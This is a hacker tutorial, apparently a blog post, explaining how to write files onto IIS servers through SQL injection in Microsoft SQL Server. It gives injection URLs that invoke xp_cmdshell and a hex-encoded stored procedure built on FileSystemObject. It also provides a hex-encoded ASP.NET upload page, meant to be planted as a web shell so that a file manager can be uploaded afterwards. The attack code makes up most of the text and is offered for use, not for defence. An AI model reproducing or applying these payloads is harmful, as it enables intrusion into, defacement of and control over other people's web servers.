In the Name of ALLAH the most beneficent and the Merciful
It was a myth for me to upload files on IIS servers, when the user is admin and we have the path also. There are ways to write files with xp_cmdshell but that is not enabled on every SQL Server due to security reasons and also not enabled by default. After i read these articles
- https://www.simple-talk.com/sql/t-sql-programming/reading-and-writing-files-in-sql-server-using-t-sql/
- http://msdn.microsoft.com/en-us/library/aa711216(v=vs.71).aspx
I knew there is a way to write files even when xp_cmdshell is not enabled. In this article I will show you both ways of writing files.
1. With xp_cmdShell
It is pretty easy when u have access to xp_cmdShell
First create file with
site.com/page.aspx?id=1;exec master..xp_cmdshell ‘type nul>path/filename.ext’– -
eg
site.com/page.aspx?id=1;exec master..xp_cmdshell ‘type NUL>D:\sites\site.com\httpdocs\rummykhan.txt’– -
it will create an empty file. Now we need to write contents into the file.
site.com/page.aspx?id=1;exec master..xp_cmdshell ‘echo rummykhan was here!!>D:\sites\site.com\httpdocs\rummykhan.txt’– -
And you’re done, file is written on server .
2. With File System Objects
here is complete Procedure Code which i used
- https://www.simple-talk.com/code/WorkingWithFiles/spWriteStringTofile.txt (by Phil Factor)
I just customized this for my need to avoid url length problem and it became something like this
Short Code, jux renamed variable and remove errors syntax, as we dont need those during SQL Injection
CREATE PROCEDURE FcUk(@st Varchar(max),@p VARCHAR(255),@fn VARCHAR(100)) AS DECLARE @ofs int,@ots int,@oeo int,@sem Varchar(1000),@cmd varchar(1000),@hr int,@fnp varchar(80) set nocount on select @sem='o' EXECUTE @hr = sp_OACreate 'Scripting.FileSystemObject', @ofs OUT Select @fnp=@p+'\'+@fn if @HR=0 Select @oeo=@ofs , @sem='Creating file "'+@fnp+'"' if @HR=0 execute @hr = sp_OAMethod @ofs,'CreateTextFile',@ots OUT,@fnp,2,True if @HR=0 Select @oeo=@ots, @sem='wttf "'+@fnp+'"' if @HR=0 execute @hr = sp_OAMethod @ots, 'Write', Null, @st if @HR=0 Select @oeo=@ots, @sem='ctf "'+@fnp+'"' if @HR=0 execute @hr = sp_OAMethod @ots, 'Close' if @hr<>0 begin Declare @Source varchar(255),@Description Varchar(255),@Helpfile Varchar(255),@HelpID int EXECUTE sp_OAGetErrorInfo @oeo, @source output,@Description output,@Helpfile output,@HelpID output end EXECUTE sp_OADestroy @ots EXECUTE sp_OADestroy @ots
I Just cut-short the variable names and remove error syntax because we dont need these while injection.
At first when testing i wrote the same proc in url, like
site.com/page.aspx?id=1;proc syntax here– -
CREATE/ALTER PROCEDURE’ must be the first statement in a query batch
This is due to restriction in T-SQL that CREATE PROC must be the first statement when u execute a batch of queries.
So to avoid this i used the EXEC( ) Function, i hex encoded the complete proc, and gave that to the EXEC( ‘Complete proc in hex’ ) and voila this worked like a charm and created the Store Procedure in SQL Server.
Here is the final syntax for creating the Store Procedure on SQL Server. I hex encoded to avoid any exception from SQL Server about quotation and to run things smoothly.
begin
declare @x varchar(MAX)
SET @x = 0x4352454154452050524f434544555245204663556b284073742056617263686172286d6178292c4070205641524348415228323535292c40666e20564152434841522831303029294153204445434c4152452020406f667320696e742c406f747320696e742c406f656f20696e742c4073656d20566172636861722831303030292c40636d6420766172636861722831303030292c40687220696e742c40666e70207661726368617228383029736574206e6f636f756e74206f6e2073656c656374204073656d3d276f27204558454355544520406872203d2073705f4f41437265617465202027536372697074696e672e46696c6553797374656d4f626a656374272c20406f6673204f55542053656c6563742040666e703d40702b275c272b40666e206966204048523d302053656c65637420406f656f3d406f6673202c204073656d3d274372656174696e672066696c652022272b40666e702b272227206966204048523d30206578656375746520406872203d2073705f4f414d6574686f6420406f66732c274372656174655465787446696c65272c406f7473204f55542c40666e702c322c54727565206966204048523d302053656c65637420406f656f3d406f74732c204073656d3d27777474662022272b40666e702b272227206966204048523d30206578656375746520406872203d2073705f4f414d6574686f642020406f74732c20275772697465272c204e756c6c2c20407374206966204048523d302053656c65637420406f656f3d406f74732c204073656d3d276374662022272b40666e702b272227206966204048523d30206578656375746520406872203d2073705f4f414d6574686f642020406f74732c2027436c6f736527206966204068723c3e3020626567696e204465636c6172652040536f75726365207661726368617228323535292c404465736372697074696f6e205661726368617228323535292c4048656c7066696c65205661726368617228323535292c4048656c70494420696e7420455845435554452073705f4f414765744572726f72496e666f2020406f656f2c2040736f75726365206f75747075742c404465736372697074696f6e206f75747075742c4048656c7066696c65206f75747075742c4048656c704944206f757470757420656e642045584543555445202073705f4f4144657374726f7920406f747320455845435554452073705f4f4144657374726f7920406f7473;
EXEC(@x)
end
And we can use it like
site.com/page.aspx?id=1;above syntax here — -
The above Query will create a Store Procedure named FcUk which take 3 param,
1. File Contents
2. Full Path
3. File Name
Now the next thing is to excute that proc, to execute this proc
site.com/page.aspx?id=1; exec FcUk ‘file contents here.’,’Full path’,’file name’– -
eg
site.com/page.aspx?id=1; exec FcUk ‘rummykhan was here!!’,’D:\sites\site.com\httpdocs\’,’rummykhan.txt’– -
now access the file and enjoy.
A tiny Uploader to avoid url length problem
begin declare @x varchar(MAX) SET @x=0xfeff3c25402050616765204c616e67756167653d224323222044656275673d2266616c7365222074726163653d2266616c7365222076616c6964617465526571756573743d2266616c73652220456e61626c655669657753746174654d61633d2266616c73652220456e61626c655669657753746174653d227472756522253e3c7363726970742072756e61743d22736572766572223e70726f74656374656420766f69642075706c5f436c69636b286f626a6563742073656e6465722c204576656e7441726773206529207b7472797b6966202866752e48617346696c65297b66752e536176654173285365727665722e4d61705061746828222e2229202b225c5c222b2053797374656d2e494f2e506174682e47657446696c654e616d652866752e46696c654e616d6529293b526573706f6e73652e577269746528225375636365737322293b7d7d63617463687b526573706f6e73652e577269746528224661696c656422293b7d7d203c2f7363726970743e3c666f726d2069643d22666f726d31222072756e61743d22736572766572223e3c6173703a46696c6555706c6f61642049443d226675222072756e61743d2273657276657222202f3e3c6173703a427574746f6e2049443d2275706c222072756e61743d227365727665722220546578743d2255706c6f616422204f6e436c69636b3d2275706c5f436c69636b22202f3e3c2f666f726d3e exec FcUk @x,’path here’,’filename’ end
use this syntax like
site.com/page.aspx?id=1;above uploader syntax here– -
and access it and upload your file manager.
POC
Original Video : http://youtu.be/DtWRQG0BaMI
Article By : Rummy Khan (fb/rummykhan)